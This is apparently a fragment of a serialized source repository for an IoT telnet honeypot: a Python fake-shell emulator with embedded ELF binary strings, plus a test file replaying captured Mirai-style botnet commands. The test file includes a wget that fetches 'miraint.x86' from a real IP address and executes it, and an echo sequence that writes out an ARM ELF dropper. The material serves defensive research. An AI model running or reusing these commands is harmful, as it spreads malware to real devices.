    "content": "import sys\nimport traceback\n\nfrom grammar       import parse, TreeNode\nfrom commands.base import Proc\n\ndef filter_ascii(string):\n\tstring = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in \" \")\n\treturn string\n\n###\n\nELF_BIN_ARM  = \"\\x7fELF\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00(\\x00\\x01\\x00\\x00\\x00h\\xc2\\x00\\x004\\x00\\x00\\x00X^\\x01\\x00\\x02\\x00\\x00\\x054\\x00 \\x00\\x08\\x00(\\x00\\x1c\\x00\\x1b\\x00\\x01\\x00\\x00p\\xc0X\\x01\\x00\\xc0\\xd8\\x01\\x00\\xc0\\xd8\\x01\\x00\\x18\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x06\\x00\\x00\\x004\\x00\\x00\\x004\\x80\\x00\\x004\\x80\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x004\\x01\\x00\\x004\\x81\\x00\\x004\\x81\\x00\\x00\\x13\\x00\\x00\\x00\\x13\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x80\\x00\\x00\\xdcX\\x01\\x00\\xdcX\\x01\\x00\\x05\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x01\\x00\\x00\\x00\\xdcX\\x01\\x00\\xdcX\\x02\\x00\\xdcX\\x02\\x00\\x1c\\x04\\x00\\x00\\xbc\\x10\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x02\\x00\\x00\\x00\\xe8X\\x01\\x00\\xe8X\\x02\\x00\\xe8X\\x02\\x00\\x08\\x01\\x00\\x00\\x08\\x01\\x00\\x00\\x06\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00H\\x01\\x00\\x00H\\x81\\x00\\x00H\\x81\\x00\\x00D\\x00\\x00\\x00D\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00Q\\xe5td\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x04\\x00\\x00\\x00/lib/ld-linux.so.3\\x00\\x00\\x04\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00GNU\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x03\\x00\\x00\\x00GNU\\x00\\x02Tz0\\x80\\x94\\xc2\\x8e%\\xf1\\xa4\\xad\\xc7D\\xa9\\x91q
\\x94\\xdb\\na\\x00\\x00\\x00\\x06\\x00\\x00\\x00 \\x00\\x00\\x00\\n\\x00\\x00\\x00\\x00I\\x10\\x92\\x02D\\x1b&@\\x10@\\xe0B\\x00`\\x00\\x91AA\\x10\\x00r\\x11\\x11aH\\x14(\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x80\\x90\\t\\x00 \\x08\\x00*\\x00@\\x00$\\xad\\x11\\x10\\x81,(\\x00\\x00\\t@J!\\x91\\x19\\xadA\\x04\\x80IE\\x85\\x85\\xf0\\x88\\xb3h\\x80\\x02H\\x08\\x80\\x80\\x00\\x08\\x01(d\\x0e!M\\xe0\\xa8D\\x94\\x02 \\x00\\x08\\x01\\x87)\\x00\\x08\\n\\x00J\\x08\\x0e\\x01\\xc0-\\x00 @\\x18\\x80d\\xe6 \\x81\\x02\\x00\\x89\\n\\x90\\x00$\\x0e\\x8c\\xb0(\\x06\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\t\\x00\\x00\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\r\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1d\\x00\\x00\\x00\\x1e\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00%\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00,\\x00\\x00\\x000\\x00\\x00\\x002\\x00\\x00\\x00\\x00\\x00\\x00\\x003\\x00\\x00\\x00\\x00\\x00\\x00\\x006\\x00\\x00\\x008\\x00\\x00\\x00:\\x00\\x00\\x00<\\x00\\x00\\x00>\\x00\\x00\\x00?\\x00\\x00\\x00A\\x00\\x00\\x00G\\x00\\x00\\x00I\\x00\\x00\\x00\\x00\\x00\\x00\\x00J\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x00\\x00\\x00L\\x00\\x00\\x00\\x00\\x00\\x00\\x00N\\x00\\x00\\x00R\\x00\\x00\\x00S\\x00\\x00\\x00T\\x00\\x00\\x00U\\x00\\x00\\x00\\x00\\x00\\x00\\x00V\\x00\\x00\\x00W\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00Y\\x00\\x00\\x00Z\\x00\\x00\\x00\\\\\\x00\\x00\\x00^\\x00\\x00\\x00`\\x00\\x00\\x00c\\x00\\x00\\x00d\\x00\\x00\\x00f\\x00\\x00\\x00h\\x00\\x00\\x00i\\x00\\x00\\x00k\\x00\\x00\\x00n\\x00\\x00\\x00q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00\\
x00\\x00v\\x00\\x00\\x00y\\x00\\x00\\x00z\\x00\\x00\\x00\\x00\\x00\\x00\\x00{\\x00\\x00\\x00\\x00\\x00\\x00\\x00}\\x00\\x00\\x00~\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x81\\x00\\x00\\x00\\x82\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\x00\\x00\\x00\\x08,\\xae\\xff_\\x96\\x93\\x1c\\x03}\\x1eL\\xa3Z\\xef\\x90V\\xdb\\x93\\x1c\\xa8vbICw)\\x91,2@\\xfd\\xda\\x80A\\xb7\\xed\\xe9C+\\xf1\\x81B\\x84\\xcf\\x18L\\x0fvT<\\x94\\xca\\x96\\x93\\x1c\\xcd?\\x0c\\xaf\\x88j\\x06\\xaf\\x8dm\\x94\\x06\\x08~\\x92\\x1c!t\\xb0\\x02\\xe2\\xad\\xc6\\x1b.N=\\xf6\\xdb\\xf7\\x00^\\x01\\xaf4\\xe8_t;\\xc5\"\n\nELF_BIN_X86  = \"\\x7fELF\\x02\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00>\\x00\\x01\\x00\\x00\\x00P\\x1c\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\x81\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x008\\x00\\t\\x00@\\x00\\x1c\\x00\\x1b\\x00\\x06\\x00\\x00\\x00\\x05\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x008\\x02\\x00\\x00\\x00\\x00\\x00\\x008\\x02\\x00\\x00\\x00\\x00\\x00\\x008\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x98m\\x00\\x00\\x00\\x00\\x00\\x00\\x98m\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\xf0{\\x00\\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\x90\\x04\\x00\\x00\\x00\\x00\\x00\\x000\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 
\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x06\\x00\\x00\\x00X|\\x00\\x00\\x00\\x00\\x00\\x00X| \\x00\\x00\\x00\\x00\\x00X| \\x00\\x00\\x00\\x00\\x00\\xf0\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00T\\x02\\x00\\x00\\x00\\x00\\x00\\x00T\\x02\\x00\\x00\\x00\\x00\\x00\\x00T\\x02\\x00\\x00\\x00\\x00\\x00\\x00D\\x00\\x00\\x00\\x00\\x00\\x00\\x00D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\xe5td\\x04\\x00\\x00\\x00d`\\x00\\x00\\x00\\x00\\x00\\x00d`\\x00\\x00\\x00\\x00\\x00\\x00d`\\x00\\x00\\x00\\x00\\x00\\x00D\\x02\\x00\\x00\\x00\\x00\\x00\\x00D\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00Q\\xe5td\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00R\\xe5td\\x04\\x00\\x00\\x00\\xf0{\\x00\\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\xf0{ \\x00\\x00\\x00\\x00\\x00\\x10\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00/lib64/ld-linux-x86-64.so.2\\x00\\x04\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00GNU\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x03\\x00\\x00\\x00GNU\\x00Y\\xde\\xf0\\x1bLK<H}\\x8b\\xb8\\x98mI\\xbeo\\xf4b8w\\x03\\x00\\x00\\x005\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x12\\x01\\xd2$\\x12)\\x00V`A\\x00\\x0e 
\\x00\\x00\\x005\\x00\\x00\\x009\\x00\\x00\\x00@\\x00\\x00\\x00\\x04\\x8b&\\xa4(\\x1d\\x8c\\x1c\\x10\\x8aM#\\xc9MB#\\xbcPv\\x9e\\xacK\\xe3\\xc0\\x96\\xa0\\x89\\x97F-\\xe4\\xde\\xce,cr\\xe4bA\\xf59\\xf2\\x8b\\x1c*\\xd4\\xb8\\xd3\\x1c\\xedc*?\\x04K\\x86\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00<\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00s\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xca\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x001\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd9\\x02\\x00\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00y\\x00\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00j\\x01\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\nglobalfiles = {\n    \"/proc/mounts\": \"\"\"/dev/root /rom squashfs ro,relatime 0 0\nproc /proc proc rw,nosuid,nodev,noexec,noatime 0 0\nsysfs /sys sysfs rw,nosuid,nodev,noexec,noatime 0 0\ntmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0\n/dev/mtdblock10 /overlay jffs2 rw,noatime 0 0\noverlayfs:/overlay / overlay rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work 0 0\ntmpfs /dev tmpfs rw,nosuid,relatime,size=512k,mode=755 0 0\ndevpts /dev/pts devpts rw,nosuid,noexec,relatime,mode=600 0 0\ndebugfs /sys/kernel/debug debugfs rw,noatime 0 0\\n\"\"\",\n    
\"/proc/cpuinfo\": \"\"\"processor       : 0\nmodel name      : ARMv6-compatible processor rev 7 (v6l)\nBogoMIPS        : 697.95\nFeatures        : half thumb fastmult vfp edsp java tls \nCPU implementer : 0x41\nCPU architecture: 7\nCPU variant     : 0x0\nCPU part        : 0xb76\nCPU revision    : 7\n\nHardware        : BCM2835\nRevision        : 000e\nSerial          : 0000000000000000\\n\"\"\",\n    \"/bin/echo\": ELF_BIN_ARM,\n    \"/bin/busybox\": ELF_BIN_ARM\n}\n\ndef instantwrite(msg):\n\tsys.stdout.write(msg)\n\tsys.stdout.flush()\n\nclass Env:\n\tdef __init__(self, output=instantwrite):\n\t\tself.files   = {}\n\t\tself.deleted = []\n\t\tself.events  = {}\n\t\tself.output  = output\n\n\tdef write(self, string):\n\t\tself.output(string)\n\n\tdef deleteFile(self, path):\n\t\tif path in self.files:\n\t\t    self.deleted.append((path, self.files[path]))\n\t\t    del self.files[path]\n\n\tdef writeFile(self, path, string):\n\t\tif path in self.files:\n\t\t    self.files[path] += string\n\t\telse:\n\t\t    self.files[path] = string\n\n\tdef readFile(self, path):\n\t\tif path in self.files:\n\t\t    return self.files[path]\n\t\telif path in globalfiles:\n\t\t    return globalfiles[path]\n\t\telse:\n\t\t    return None\n\n\tdef listen(self, event, handler):\n\t\tself.events[event] = handler\n\n\tdef action(self, event, data):\n\t\tif event in self.events:\n\t\t    self.events[event](data)\n\t\telse:\n\t\t    print(\"WARNING: Event '\" + event + \"' not registered\")\n\t\t    \n\tdef listfiles(self):\n\t\treturn self.files\n\nclass RedirEnv:\n\tdef __init__(self, baseenv, redir):\n\t\tself.baseenv = baseenv\n\t\tself.redir   = redir\n\n\tdef write(self, string):\n\t\tself.baseenv.writeFile(self.redir, string)\n\n\tdef deleteFile(self, path):\n\t\tself.baseenv.deleteFile(path)\n\n\tdef writeFile(self, path, string):\n\t\tself.baseenv.writeFile(path, string)\n\n\tdef readFile(self, path):\n\t\treturn self.baseenv.readFile(path)\n\n\tdef listen(self, event, 
handler):\n\t\tself.baseenv.listen(event, handler)\n\n\tdef action(self, event, data):\n\t\tself.baseenv.action(event, data)\n\t\t    \n\tdef listfiles(self):\n\t\treturn self.baseenv.listfiles()\n\nclass Command:\n    def __init__(self, args):\n        self.args             = args\n        self.redirect_from_f  = None\n        self.redirect_to_f    = None\n        self.redirect_append  = False\n        self.shell            = Proc.get(\"exec\")\n        \n    def redirect_to(self, filename):\n        self.redirect_to_f = filename\n        self.redirect_append = False\n        \n    def redirect_from(self, filename):\n        self.redirect_from_f = filename\n        \n    def redirect_app(self, filename):\n        self.redirect_to(filename)\n        self.redirect_append = True\n\n    def run(self, env):\n        if self.isnone():\n            return 0\n        \n        if self.redirect_to_f != None:\n            if not(self.redirect_append):\n                env.deleteFile(self.redirect_to_f)\n            env = RedirEnv(env, self.redirect_to_f)\n            \n        return self.shell.run(env, self.args)\n    \n    def isnone(self):\n        return len(self.args) == 0\n\n    def __str__(self):\n        return \"cmd(\" + \" \".join(self.args) + \")\"\n\nclass CommandList:\n\n    def __init__(self, mode, cmd1, cmd2):\n        self.mode = mode\n        self.cmd1 = cmd1\n        self.cmd2 = cmd2\n        \n    def redirect_to(self, filename):\n        self.cmd1.redirect_to(filename)\n        self.cmd2.redirect_to(filename)\n        \n    def redirect_from(self, filename):\n        self.cmd1.redirect_from(filename)\n        self.cmd2.redirect_from(filename)\n        \n    def redirect_app(self, filename):\n        self.cmd1.redirect_app(filename)\n        self.cmd2.redirect_app(filename)\n\n    def run(self, env):\n        ret = self.cmd1.run(env)\n        if (self.mode == \"&&\"):\n            if (ret == 0):\n                return self.cmd2.run(env)\n            
else:\n                return ret\n        elif (self.mode == \"||\"):\n            if (ret != 0):\n                return self.cmd2.run(env)\n            else:\n                return ret\n        elif (self.mode == \";\"):\n            if self.cmd2.isnone():\n                return ret            \n            return self.cmd2.run(env)\n        else:\n            print \"WARNING: unsupported mode \" + self.mode\n            return 1\n        \n    def isnone(self):\n        return self.cmd1.isnone() and self.cmd2.isnone()\n\n    def __str__(self):\n        return \"(\" + str(self.cmd1) + self.mode + str(self.cmd2) + \")\"\n\nclass Actions(object):\n    def make_arg_noquot(self, input, start, end, elements):\n        return input[start:end]\n\n    def make_arg_quot(self, input, start, end, elements):\n        return elements[1].text\n\n    def make_list(self, input, start, end, elements):\n        c1 = elements[0]\n        \n        if len(elements[1].elements) != 0:\n            c2 = elements[1].elements[3]\n            \n            return CommandList(\";\", c1, c2)\n        \n        return c1\n    \n    def make_single(self, input, start, end, elements):\n        c1 = elements[0]\n        \n        if len(elements[1].elements) != 0:\n            c2 = elements[1].elements[3]\n            op = elements[1].elements[1]\n            \n            return CommandList(op.text, c1, c2)\n        \n        return c1\n    \n    def make_pipe(self, input, start, end, elements):\n        c1 = elements[0]\n        \n        if len(elements[1].elements) != 0:\n            c2 = elements[1].elements[3]\n            \n            c1.redirect_to(\"/dev/pipe\")\n            c2.redirect_from(\"/dev/pipe\")\n            \n            return CommandList(\";\", c1, c2)\n        \n        \n        return c1\n    \n    def make_redir(self, input, start, end, elements):\n        \n        c = elements[0]\n        \n        for redirect in elements[1].elements:\n            operator = redirect.elements[1].text\n            filename = redirect.elements[3]\n            \n            if operator == \">\":\n                c.redirect_to(filename)\n            elif operator == \">>\":\n                c.redirect_app(filename)\n            elif operator == \"<\":\n                c.redirect_from(filename)\n            else:\n                print \"WARNING: unsupported redirect operator \" + operator\n                \n        return c\n    \n    def make_cmdbrac(self, input, start, end, elements):\n        return elements[2]\n    \n    def make_args(self, input, start, end, elements):\n        if isinstance(elements[0], basestring): \n            r = [ elements[0] ]\n        else:\n            r = []\n        \n        for arg in elements[1].elements:\n            if isinstance(arg.elements[1], basestring):\n                r.append(arg.elements[1])\n        \n        c = Command(r)\n        \n        return c\n\ndef run(string, env):\n    c = parse(filter_ascii(string).strip(), actions=Actions())\n    return c.run(env)\n\ndef test_shell():\n    env = Env()\n    while True:\n        sys.stdout.write(\" # \")\n        sys.stdout.flush()\n        line = sys.stdin.readline()\n        if line == \"\":\n            break\n        if line == \"\\n\":\n            continue\n        line = line[:-1] \n        tree = run(line, env)\n        sys.stdout.flush()\n\n"
  },
  {
    "path": "honeypot/shell/test.sh",
    "content": "#!/bin/bash\ncanopy grammar.peg --lang python && python shell.py < test.txt\n\n"
  },
  {
    "path": "honeypot/shell/test.txt",
    "content": "cp\nls\ncat\ndd\nrm\necho\nbusybox\nsh\ncd\ntrue\nfalse\nchmod\nuname\n:\nps\n\nenable\nshell\nsh\n/bin/busybox ECCHI\n/bin/busybox ps; /bin/busybox ECCHI\n/bin/busybox cat /proc/mounts; /bin/busybox ECCHI\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.\n/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon\n/bin/busybox ECCHI\nrm /proc/.t; rm /proc/.sh; rm /proc/.human\nrm /sys/.t; rm /sys/.sh; rm /sys/.human\nrm /tmp/.t; rm /tmp/.sh; rm /tmp/.human\nrm /overlay/.t; rm /overlay/.sh; rm /overlay/.human\nrm /.t; rm /.sh; rm /.human\nrm /dev/.t; rm /dev/.sh; rm /dev/.human\nrm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human\nrm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human\nrm /dev/.t; rm /dev/.sh; rm /dev/.human\ncd /proc/\n/bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI\n/bin/busybox cat 
/bin/echo\n/bin/busybox ECCHI\n/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI\n/bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI\n./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE\nrm -rf upnp; > dvrpelper; /bin/busybox ECCHI\ncat /proc/mounts; (/bin/busybox DFYHE || :)\necho -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x28\\x00\\x01\\x00\\x00\\x00\\x54\\x00\\x01\\x00\\x34\\x00\\x00\\x00\\x40\\x01\\x00\\x00\\x00\\x02\\x00\\x05\\x34\\x00\\x20\\x00\\x01\\x00\\x28\\x00\\x04\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" >> .s\necho -ne \"\\x00\\x00\\x01\\x00\\xf8\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x02\\x00\\xa0\\xe3\\x01\\x10\\xa0\\xe3\\x06\\x20\\xa0\\xe3\\x07\\x00\\x2d\\xe9\\x01\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x0c\\xd0\\x8d\\xe2\\x00\\x60\\xa0\\xe1\\x70\\x10\\x8f\\xe2\\x10\\x20\\xa0\\xe3\" >> .s\necho -ne \"\\x07\\x00\\x2d\\xe9\\x03\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x14\\xd0\\x8d\\xe2\\x4f\\x4f\\x4d\\xe2\\x05\\x50\\x45\\xe0\\x06\\x00\\xa0\\xe1\\x04\\x10\\xa0\\xe1\\x4b\\x2f\\xa0\\xe3\\x01\\x3c\\xa0\\xe3\\x0f\\x00\\x2d\\xe9\\x0a\\x00\\xa0\\xe3\\x0d\\x10\\xa0\\xe1\\x66\\x00\\x90\\xef\\x10\\xd0\\x8d\\xe2\" >> .s\necho -ne \"\\x00\\x50\\x85\\xe0\\x00\\x00\\x50\\xe3\\x04\\x00\\x00\\xda\\x00\\x20\\xa0\\xe1\\x01\\x00\\xa0\\xe3\\x04\\x10\\xa0\\xe1\\x04\\x00\\x90\\xef\\xee\\xff\\xff\\xea\\x4f\\xdf\\x8d\\xe2\\x00\\x00\\x40\\xe0\\x01\\x70\\xa0\\xe3\\x00\\x00\\x00\\xef\\x02\\x00\\x68\\xab\\xb1\\x67\\xe2\\xc5\\x41\\x26\\x00\\x00\\x00\\x61\\x65\\x61\" >> .s\necho -ne 
\"\\x62\\x69\\x00\\x01\\x1c\\x00\\x00\\x00\\x05\\x43\\x6f\\x72\\x74\\x65\\x78\\x2d\\x41\\x35\\x00\\x06\\x0a\\x07\\x41\\x08\\x01\\x09\\x02\\x2a\\x01\\x44\\x01\\x00\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x74\\x65\\x78\\x74\\x00\\x2e\\x41\\x52\\x4d\\x2e\\x61\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x73\\x00\" >> .s\necho -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x54\\x00\\x01\\x00\\x54\\x00\\x00\\x00\\xa4\\x00\\x00\\x00\" >> .s\necho -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x03\\x00\\x00\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x27\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\" >> .s\necho -ne \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x01\\x00\\x00\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" >> .s\ncat .s\n/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\\x0181c46036\\x7f'; /bin/busybox printf '\\00281c46036\\177'; /bin/echo -ne '\\x0381c46036\\x7f'; /usr/bin/printf '\\00481c46036\\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp;\n\n"
  },
  {
    "path": "honeypot/telnet.py",
